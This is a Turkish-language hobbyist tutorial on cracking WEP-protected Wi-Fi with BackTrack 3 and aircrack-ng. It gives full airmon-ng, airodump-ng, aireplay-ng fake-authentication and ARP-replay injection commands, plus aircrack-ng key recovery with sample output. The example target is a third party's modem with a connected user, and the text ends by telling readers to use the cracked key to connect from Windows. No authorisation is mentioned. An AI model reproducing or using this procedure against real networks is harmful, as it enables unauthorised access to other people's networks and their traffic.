WEP windows ağ baglantisi sihirbazinda(XP) güvenlik etkin kablosuz ağ yazan wireless aglardir.Güvenlik etin kablosuz ağ (WPA) yada (WPA2) yazanlar anlaşıldığı üzere wpa dır ve kırılması wep e göre oldukça zordur.Wep ilk olarak ortaya çıktığında başlıkta görüldüğü üzere (wired equivalent privacy = kabloluya eşdeğer gizlilik) kablosuz ağlarda ihtiyaç duyulan güvenlik çözümü olarak lanse edilmiştir ancak düşünüldüğü kadar güvenli bir şifreleme sistemi olmadığı zamanla anlaşılmıştır..WEP her bir pakedin bir anahtar ile şifrelenip gönderilmesine ve ayni anahtar ile diğer tarafta açılarak kullanılmasına dayalı sıradan bir crypto sistemidir.Kullanılan anahtarlar 40bit ve 104 bit olabilir (64 bit wep ve 128 bit wep) ve bu anahtarlar normal ascii karakterlerden (A-Z 0-9 %,# vs) olusabileceği gibi 16 lik sistemde yazilmista olabilir (HEX) Normal bir 104 bit wep key (hex) buna benzer “82:89:B9:25:55:6D:F2:AE:E4:56:3A:FC:93”
Gelelim wep kırmak icin gerekli malzemelere:
1-Bilgisayar
(tercihan laptop, sinyal alabilmek için mobilite lazım bazen)
2-Backtrack live cd Linux (http://www.remote-exploit.org/backtrack_download.html)
(tercihan backtrack 3 çünkü injection destekli driverlar icinde hazır olarak gelmekte)
3-injection ve monitor yeteneklerine sahip ve BT3 te sürücüleri bulunan bir wireless cihaz
4-Eğer kullanıyorsanız: Sigara ,kahve ve tabi ki sabır.
Bu doküman boyunca göreceğiniz screenshotlar Backtrack3 te screenshot alıp kaydetmek zor geldiğinden kendi bilgisayarımda kurulu slackwareden aldıgım screenshotlarldır.Ancak takip etmekte zorlanacağınızı düşünmüyorum.Çünkü yeterince yol göstericiler.
1 Backtrack CD sini takınız.
2 Bilgisayarı Cd den boot ediniz.
3 karsınıza gelen menüden en üstteki BT3 Graphics Mode (KDE) seçeneğini entere basip seçin
4 ekrandan yazıların akmasını bekleyiniz. (bazı sistemlerde bi yerlerde donup kalabilir birkaç dk içinde devam etmezse birşeyler yanlış demektir)
5 ekran bir kararıp vs geldikten sonra karşınıza bi el ve parmak izi vs iceren abidik bi ekran gelicek ekranın sağına soluna bi kac kez tıklayıp kurtulun ondan.
6 eger hersey yolundaysa karsınıza backtrack 3 ün hoş görünümlü Xwindows ve KDE arabirimli masaüstü gelecektir.
7 Ekranın sol altından backtrackte tam başlat menüsü butonu görevini gören
K nın yanında bulunan monitöre benzeyen ikona basarak bir terminal ekranı açın.
Karşınıza üsttekine benzer birşey gelmesi lazım.
8 - karşımızdaki komut satırında "iwconfig" komutunu kullanarak sistemimizdeki wireless cihazlara bir göz atalım.
---------------------------------------------------------------------------------------------------
root@Thetrz:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan1 RT73 WLAN ESSID:""
Mode:Managed Frequency=2.412 GHz Bit Rate=54 Mb/s
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level:-121 dBm Noise level:-111 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
root@Thetrz:~#
----------------------------------------------------------------------------------------------------------
Üstte görebileceğiniz gibi wlan1 adlı RT73 chipsetli bir wireless cihazımız var genelde laptopların dahili wireless kartlarında wlan0 veya wifi0 şeklinde olur harici usb cihazlarda ise rausb0 adında da olabilir.
Yukarıdan wireless cihazın adını alınız aklınıza yada bir kağıda yazınız.Dökümanın kalanında kendi sistemimdeki gibi "wlan1" kabul edilecektir.wlan1 gördüğünüz yere kendi wireless cihazınızın ismini yazarak devam edin (wifi0 wlan0 veya rausb0 gibi)
9 wireless cihazımızı gelen paketleri dinleyebilmek için şekildeki gibi monitor mode a geçirin.
---------------------------------------------------------------------------------------------------------------------
root@Thetrz:~# airmon-ng start wlan1
Interface Chipset Driver
wlan1 RT73 RT73usb (monitor mode enabled)
root@Thetrz:~#
10 Airodump-ng ile bir hedef seçin.
--------------------------------------------------
root@Thetrz:~# airodump-ng wlan1
---------------------------------------------------
herşey yolundaysa karşınıza şekildeki gibi birşey gelir.
İlk başta ekran boş görülebilir ancak sol üstte gördüğünüz CH yani airodump ın o an dinlemekte olduğu kanal değiştikçe birşeyler yakalaması lazım eger yakalayamıyorsa laptopu alın kucağınıza bir şeyler yakaladağı bi yerlere gidin evin içinde gezin balkona cıkın vs ama dikkat edin işlemin ortasında laptopınızın şarjı bitmesin eğer işiniz uzun sürerse mutlaka laptopun adaptörünü takın.
Simdi burada ne nedir bi açıklayalım. Sol üstte gördügünüz CH ve karşısındaki sayı o an
airodumpın dinlemekte olduğu kanalı gösterir. İlk bssid başlığı altındaki 6 parçalı hex sayı
etraftaki bir wireless accesspoint yada modemin fiziksel adresi dir (mac adress veya hardware adress diye geçer) PWR sinyal gücünü ifade eder ama pek de doğru değildir yanıltıcı olabilir. Beacons wireless modemin veya ap nin etrafa yaydığı ve airodumpun yakalayabildiği "ben buradayım adım şu adresim bu" reklam sinyallerinin sayısıdır. #Data modemin yayınladığı veri paketlerinin sayısıdır. #/s saniyede gelen paket sayısıdır.CH wireless modemin yayın yaptığı kanal numarasıdır avrupa standartında 1 ile 13 arasındaki kanallar kullanılır ancak genelde en yaygın kullanılanlar modemlerin default ayarları sebebiyle 6 ve 11 dir.MB başlığı altında modem veya AP nin wireless bağlantı hızı gösterilmektedir (megabit cinsinden ) ENC modemin kullandığı encryption tipidir.Biz WEP kullananları hedef alacağız. Cipher ve auth kisimlari bu seviyedeki bir döküman icin pek önemli değil geçiyorum.ESSID ise modemin görünen adıdır ve dikkat edilmesi gereken nokta komutları vs verirken modem adının Case sensitive yazılmasıdır.Yani büyükse büyük küçükse küçük harfler kullanılmalıdır.
İkinci bssid başlığının altındakiler ise modemlere bağlanan kullanıcıları gösterir.burada bssid bağlanılan modemin mac adresi iken station başlığı altında görünen ise modeme bağlanmakta olan kullanıcının wireless cihazının mac adresidir.
Gelelim hedef seçimine, en rahat ve hızlı kırmayı yapabilmek için karşımızdaki tablodan bol bol beacon alabildiğimiz yani beacon başlığı altındaki sayı sürekli artan ve tercihan alttaki bssid kısmından karşılaştırarak üzerinde bağlı bir kullancı olan ve kesinlikle WEP kullanan bir modemi hedef almalıyız ki bu kullanıcının gönderdiği paketleri yakalayıp modeme tekrar göndererek (injection) ,modemin şifreli paketler üretmesini sağlamalı ve bu paketleri toplayıp şifre kırma işlemimizi gerçekleştirebilmeliyiz. Örnek tabloda o zaman bizim için ideal hedef üzerinde bağlı bir kullanıcı olan ve üzerinde data trafiği olan ve wep kullanan PikatelAirMAX isimli modemdir.
Modemin Mac adressini ve ESSID sini ve yayın yaptığı kanalı not alalim. bundan sonraki örnek calısmalarda hedefin mac adressi 00:08:5C:F1:AD:E9 ve ESSID si PikatelAirMAX ve kanal numarası 11 olarak kullanılacaktır.
11 Ctrl+C ye basarak aiordump tan cıkın.
12 Bu kez paketleri kaydetmek üzere airodumpı su komut formatı ile tekrar acalım.
airodump-ng -c "kanalno" --bssid "HedefMacAdress" -w "dosyaadi" "wirelesscihazimiz"
örnek olarak:
root@Thetrz:~# airodump-ng -c 11 --bssid 00:08:5C:F1:AD:E9 -w output wlan1
karşımıza sunun gibi birşey gelmesi lazım.
Bu artık PikatelAirMAX isimli modeme gelip giden paketleri kaydediyoruz demek.az önceki aşamada PWR nin yanıltıcı olduğunu belirtmiştim buradaki rxq ise gelen sinyal kalitesini gösterir ve nispeten belirleyicidir.0 ile 100 arasında değer alır ve kırma ile ilgili işlemleri gerçekleştirebilmek için en az 30 ve üzeri olması gerektiği gözlemlenmiştir ki 30 un altında ise genelde hadi amuda kalkıp bişi yapıp sinyal aldırıp kırmayı basarsanız bile ileride bu aga bağlanırken cok sorun yaşamanıza sebep olacaktır.Bu asamada ev icerisinde gezerek ve genelde laptopların ekran kısmında olan dahili wireless antenini hareket ettirmek icin ekranı egip bükmek sureti ile elde edebildiğimiz maksimumum RXQ değerini elde etmeye calısmanız tavsiye edilir.RXQ yu tatminkar bir seviyeye getirmeyi basaramıyorsanız 10.adıma geri dönüp varsa başka bir hedef seçiniz.Eger RXQ 60 ve üzeri bir değerde ise simdilik hersey yolunda demektir.
13 bu terminal ekranını kapatmadan 7. adımdaki işlemi tekrar uygulayarak bir terminal ekranı daha açalım.
ikinci terminal de "ifconfig" komutunu vererek kendi wireless cihazımızın mac adressini not alalım.
-----------------------------------------------------------------------------------------
root@Thetrz:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0A:E4:A7:47:C2
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:20 Base address:0xa800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan1 Link encap:UNSPEC HWaddr 00-0E-2E-DA-C2-C5-6C-6F-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122775 (119.8 KiB) TX bytes:0 (0.0 b)
root@Thetrz:~#
-----------------------------------------------------------------------------------------
“wlan1 Link encap:UNSPEC HWaddr 00-0E-2E-DA-C2-C5-6C-6F-00-00-00-00-00-00-00-00”
satırında gördüğümüz “00-0E-2E-DA-C2-C5-6C-6F-00-00-00-00-00-00-00-00” daki ilk altı hex hane bizim mac adressimizdir.cizgilerin yerine : kullanın ve karşınızda wireless cihazımızın mac adressi.Bir kenara not edin.
Bu noktadan sonra örneklerde kendi wireless cihazımızın mac adressi olarak 00:0E:2E:DA:C2:C5 kullanılacaktır.
sonra bu terminal ekranında wireless modemle association kuralım yani ona veri gönderebilmek icin bir nevi eşleştirme işlemi....
komut formatımız:
aireplay-ng -1 0 -e "Modemİsmi" -a "ModemMACAdressi" -h "bizimMacAdress" "wirelesscihazımız"
örnek komut:
---------------------------------------------------------------------------------------------------------------------------
root@Thetrz:~# aireplay-ng -1 0 -e PikatelAirMAX -a 00:08:5C:F1:AD:E9 -h 00:0E:2E:DA:C2:C5 wlan1
17:01:29 Waiting for beacon frame (BSSID: 00:08:5C:F1:AD:E9) on channel 11
17:01:31 Sending Authentication Request (Open System)
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
root@Thetrz:~#
-----------------------------------------------------------------------------------------------------------------------------
yukarıda olması istenen başaralı durum gösterilmiştir.Eger yukarıdakine benzer birşeyle karşılaşırsanız sıradaki acıklamaları transit geçiniz.
Açıklamalar:
Bazen modemle aramızda cok mesafe varsa kullandığımız wireless cihazların alma gücü fazla iken gönderme gücü daha az olduğundan sinyal alabilmemize karşın karşıya paketleri ulaştıramamak söz konusu olabilir bu durumda farklı konumlardan deneme yapılmalı ve
iwconfig "wirelesscihazimiz" rate 1M (#iwconfig wlan1 rate 1M gibi)
komutu verilerek cihazımızın hızı düşürülerek sinyal gücü arttırılmaya calısılmalı ve 13. adımdaki association işlemi tekrar edilmelidir.Eger basarılı bir association yapabildiysek yukarıdaki gibi bir tablo görmeliyiz eger basaramadıysak Alttaki gibi bir tablo ile karşılaşırız.
--------------------------------------------------------------------------------------------------------------
17:20:22 Sending Authentication Request (Open System)
17:20:24 Sending Authentication Request (Open System)
17:20:26 Sending Authentication Request (Open System)
17:20:28 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower the transmit rate.
--------------------------------------------------------------------------------------------------------------
Tabloda da gördüğünüz gibi başaramamızın olası sebeplerinden biri bazı AP lerin /modemlerde mac adress filtreleme özelligi bulunuyor olmasıdır her ne kadar mac adress spoofingle bu olayı aşmak mümkünse bile karmasık bir işlem olduğundan ve kırmayı başarsak bile windows ta bağlantı aşamasındada bize sorunlar cıkaracağından bu seviyede hazırlanan bir dökümanda değinilmemiştir.
Ayrıca bu fake auth/association prosedürü bazı Ap/modem lerde gerçekleştirilememektedir. O zamanda 10. adıma dönerek varsa başka bir hedef seçmekten başka yapacak bişey yoktur :)
wireless cihazımız injection yapamıyor olabilir bu durumda wireless cihazımızın injection yapabilmesini sağlayan bir patch yada driver'ın varlığı araştırılmalıdır.
Eger association islemini gerceklestiremiyorsak sonraki adımı yani injectionu gerceklestirmemiz mümkün değildir.Ancak eger yeterli data pakedi akışı varsa yani minimum 50000 60000 tane data pakedini injection olmadan toplama sansımız varsa injection asamasına ihtiyac duymadan sadece biraz daha fazla bekleyerek yada bilgisayarımızı gerekirse birkaç gün açık bırakıp gerekli paket sayısına ulaştığımızda injection aşamasını es geçip sonraki adımlardan devam edebiliriz.Dökümanın devamını okuduğunuzda muhtemelen neden bashettiğimi daha iyi anlayacaksınız.
Eger düzgün bir association/authentication yapabildiysek ilk actıgımız terminal ekranında yani "airodump" ta bağlı kullanıcılar kısmında bir süre sonra kendi wireless cihazımızın mac adressini görebilmeliyiz.
eger herşey yolunda ise 14. adımda injection işlemine geçeceğiz.
14 Komut formatımız :
aireplay-ng -3 -b "ModemMacAdress" -h "BizimMacAdress" "wirelesscihazımız"
örnek komut:
--------------------------------------------------------------------------------------------------------------
root@Thetrz:~# aireplay-ng -3 -b 00:08:5C:F1:AD:E9 -h 00:0E:2E:DA:C2:C5 wlan1
17:55:58 Waiting for beacon frame (BSSID: 00:08:5C:F1:AD:E9) on channel 11
Saving ARP requests in replay_arp-0427-175559.cap
You should also start airodump-ng to capture replies.
Read 101 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
---------------------------------------------------------------------------------------------------------------
Eger hedef aldıgımız modeme bağlı bir kullanıcı varsa ve ağ üzerinde herhangi bir arp trafiği oluşturursa aireplay bu arp pakedini kaydedip hemen injectiona başlayacaktır.eger sistemde bir kullanıcı yoksa fragment ve chop-chop attack kullanılarak arp trafiği manuel olarak yaratılabilir ancak bu dökümanda değinilmeyecektir.Bunun yerine bir kullanıcı modeme bağlanana kadar beklenilmesi tavsiye edilir.aireplay bir arp pakedi yakalayıp injectiona başladığında görüntü şunun gibi olur.
-----------------------------------------------------------------------------------------------------------------------
root@Thetrz:~# aireplay-ng -3 -b 00:08:5C:F1:AD:E9 -h 00:0E:2E:DA:C2:C5 wlan1
17:55:58 Waiting for beacon frame (BSSID: 00:08:5C:F1:AD:E9) on channel 11
Saving ARP requests in replay_arp-0427-175559.cap
You should also start airodump-ng to capture replies.
Read 1023441 packets (got 1234 ARP requests and 12345 ACKs), sent 1124343 packets...(400 pps)
-----------------------------------------------------------------------------------------------------------------------
Eger injection işlemimiz başarılı ise airodump ta #data paketlerinin hızla arttığını görmemiz gerekir.
Kırma işlemine yani 15. adıma geçmeden önce airodumpta en az 50000 civarında data pakedinin yakalandığını teyid ediniz.Yakalanması gereken paket sayısı karşımızdaki şifre ile alakalıdır ve esasen bazı şifreler 3-5 bin paket ile dahi kırılabilir ancak ortalama uzunlukta bir şifre için 50000 civarındaki paket sayısı başlangıç için iyi bir rakamdır.
15.Elde ettiğimiz paketleri kullanarak key i kırma.
sonra komut formatımız:
aircrack-ng -z -b "ModemMacAdressi" "dosyaadi*.cap"
örnek komut:
---------------------------------------------------------------------------------------------------------------------
root@Thetrz:~# aircrack-ng -z -b 00:08:5C:F1:AD:E9 output*.cap
Aircrack-ng 1.0 beta2
[00:00:00] Tested 851 keys (got 68348 IVs)
KB depth byte(vote)
0 0/ 9 B0(35328) 93(34560) C1(34560) DA(34560) 02(34048) 1D(33792) 26(33792)
1 0/ 1 97(40448) DB(36096) 49(34560) 20(34048) 0A(33792) 2E(33536) 94(33536)
2 0/ 1 D7(40192) 81(35840) AE(35840) 9E(34304) B1(34304) 91(33792) 59(33280)
3 7/ 3 FA(34304) 42(34048) C7(34048) DF(34048) 2A(33792) 0E(33024) 32(33024)
4 4/ 4 8E(34816) 95(34560) 27(34304) 4C(34048) 67(33792) A1(33792) FD(33536)
------------------------------------------------------------------------------------------------------------------------
ortalama bir 40 bit wep şifresini kirmak icin 20000 IV 104 bit kırmak icinse 40000 IV genelde yeterlidir.Ancak bazı durumlarda 1.000.000 IV ye kadar beklemek gerekir ki eger hızlı injection yapabilen bir wireless cihaza sahipseniz buda en fazla yarım saat civarında sürecektir.
eger kırma işlemi başarı ile sonuçlanırsa karşınıza...
---------------------------------------------------------------------------------------------------------------------------
Aircrack-ng 1.0 beta2
[00:01:18] Tested 0/140000 keys (got 30680 IVs)
KB depth byte(vote)
0 0/ 1 12( 170) 35( 152) AA( 146) 17( 145) 86( 143) F0( 143) AE( 142) C5( 142) D4( 142) 50( 140)
1 0/ 1 34( 163) BB( 160) CF( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7F( 137) 18( 136)
2 0/ 1 56( 162) E9( 147) 1E( 146) 32( 146) 6E( 145) 79( 143) E7( 142) EB( 142) 75( 141) 31( 140)
3 0/ 1 78( 158) 13( 156) 01( 152) 5F( 151) 28( 149) 59( 145) FC( 145) 7E( 143) 76( 142) 92( 142)
4 0/ 1 90( 183) 8B( 156) D7( 148) E0( 146) 18( 145) 33( 145) 96( 144) 2B( 143) 88( 143) 41( 141)
KEY FOUND! [ 1E:3D:5F:27:90:AB:2F:11:BA:1E:2C:3D:5F ]
Decrypted correctly: 100%
------------------------------------------------------------------------------------------------------------------
gibi bisey gelmesi gerekir.
buradaki keyi parantez ve “:” lar olmadan
1e3d5f2790ab2f11ba1e2c3d5f seklinde windowsta bağlantı için kullanabilirsiniz .
eger karşınızdaki key i kırabilmek için yeterli sayıda iv toplayamadıysanız....
----------------------------------------------------------------------------------------------------------------------
Aircrack-ng 1.0 beta2
[00:01:27] Tested 131329 keys (got 40002 IVs)
KB depth byte(vote)
0 75/ 84 E6(42496) 5B(42240) 7B(42240) 9F(42240) A6(42240) B3(42240) C2(42240)
1 2/ 4 06(48896) 61(48640) A8(47872) 57(47104) 8B(46592) CF(46592) 60(46080)
2 5/ 6 2D(46848) 93(46592) B8(46592) E4(46592) FC(46336) 59(46080) 5E(46080)
3 61/ 3 F5(43264) 14(43008) F4(43008) 16(42752) 5C(42752) 9C(42752) BC(42752)
4 44/ 4 A6(43776) 1E(43520) 80(43520) 88(43520) B5(43520) BF(43520) DE(43520)
Failed. Next try with 45000 IVs.
---------------------------------------------------------------------------------------------------------------------
seklinde bir seyle karsilasabilirsiniz bekleyin! aircrack her 5000 iv topladiginda tekrar deneyecektir.
eger 1 milyon civarında iv toplamanıza ragmen hala keyi elde edemediyseniz adımın başında belirttigimiz aircrack komutunda -z yi kaldırıp deneyin eger yine basaramazsaniz -z nin oldugu yere bir -y koyarak tekrar deneyin.
Kırma islemimiz bittiginde terminale "reboot" yazarak sistemi yeniden başlatıp windowsa dönebilirsiniz.
Bilgisayarın içindeki backtrack live cd yi sistem otomatik olarak cıkartacaktır .
Bu dökümanı ilk takip edişinizde zorlansanızda bir kaç kez bu işlemleri gerçekleştirirseniz esasen hiç te zor bişey olmadığını farkedeceksiniz.
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack adresinde benzer bir tutorial bulunmaktadır herhangi bir durumda göz atınız.
http://www.aircrack-ng.org/doku.php?id=flowchart buradada wep kırma süreci bir akış şeması şeklinde verilmiştir.
